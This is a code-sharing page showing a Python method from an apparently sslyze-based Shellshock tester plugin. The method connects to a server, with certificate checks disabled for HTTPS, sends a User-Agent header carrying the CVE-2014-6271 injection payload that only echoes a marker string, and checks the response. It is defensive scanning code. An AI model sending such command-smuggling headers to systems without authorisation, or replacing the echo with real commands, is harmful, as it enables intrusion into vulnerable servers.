shellshock_tester_plugin.py 文件源码

python
阅读 24 收藏 0 点赞 0 评论 0

项目:midip-sslyze 作者: soukupa5 项目源码 文件源码
def process_task(self, server_connectivity_info, plugin_command, option_dict=None):
        if option_dict and 'path' in option_dict.keys():
            path = str(option_dict['path'])
        else:
            path = '/'
        if server_connectivity_info.port == 80:
            conn = httplib.HTTPConnection(server_connectivity_info.ip_address,server_connectivity_info.port)
        elif server_connectivity_info.port == 443:
            conn = httplib.HTTPSConnection(server_connectivity_info.ip_address,server_connectivity_info.port,context=ssl._create_unverified_context())
        else:
            raise ValueError("ShellshockTesterPlugin: Can\'t make test for this port {0}".format(server_connectivity_info.port))

        try:
            conn.connect()
        except Exception as e:
            raise ValueError("ShellshockTesterPlugin: Connection error for port {0}. {1}".format(server_connectivity_info.port,str(e)))
        else:
            conn.request("GET", path, "", {'User-Agent': '() { :; }; echo; echo Vulnerable to CVE-2014-6271'})
            response = conn.getresponse()

        return ShellshockTesterResult(server_connectivity_info, plugin_command, option_dict, self.is_vulnerable(response))
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号